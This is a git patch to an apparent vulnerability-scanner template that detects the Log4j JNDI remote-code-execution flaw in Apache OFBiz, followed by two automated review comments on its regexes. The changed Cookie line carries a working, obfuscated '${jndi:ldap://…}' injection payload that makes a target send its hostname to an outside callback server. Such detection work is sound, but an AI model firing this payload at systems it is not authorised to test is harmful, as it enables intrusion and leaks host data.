From 3cf8d0bd94e4b63ee8bd4320c9fe17b1295c581c Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 3 May 2023 17:21:48 +0530
Subject: [PATCH] Update All Existing Log4j Templates
---
 .../vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)
diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
index 6945955a8d..b5b082566d 100644
--- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
+++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
@@ -21,12 +21,16 @@ info:
 shodan-query: http.html:"Apache OFBiz"
 tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
 GET /webtools/control/main HTTP/1.1
 Host: {{Hostname}}
- Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
+ Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}

 matchers-condition: and
 matchers:
@@ -38,13 +42,13 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 extractors:
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by mp on 2022/05/27
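Review bot: The new `variables` block has no comment tying `rand1` and `rand2` to the `\d{6}` prefix that the matcher and extractor regexes in the second hunk hard-code, so changing either `rand_int` range to something other than three digits would silently stop the template from matching. A one-line comment above the block would cover it, for example `# rand1 + rand2 concatenate into the 6-digit marker matched by \d{6} below; keep both ranges three digits wide`. The fixed `.uri.` label added to the `Cookie` line is also unexplained and deserves a short comment, because the regexes depend on its position in the name. The `http:` request block continues outside the hunk.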
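Review bot: Both new regexes match the fixed `uri` label with a generic `([a-z0-9]+)` group, and because group 1 also accepts dots and is greedy, the extracted host name can absorb `.uri` when the interaction server's domain has more than two labels (inferred from the pattern, not tested). Anchoring on the literal keeps group 1 clean in both the matcher and the extractor: `- '\d{6}\.([a-zA-Z0-9\.\-]+)\.uri\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`. `\d{6}` also accepts any six digits rather than this request's `{{rand1}}{{rand2}}`, so the marker does not tie a callback to the request that caused it; if the engine expands variables inside matcher regexes, using them there would tighten the check. The matcher's trailing comment now reads "Print extracted …", which is the extractor's wording, and should stay "Match for …".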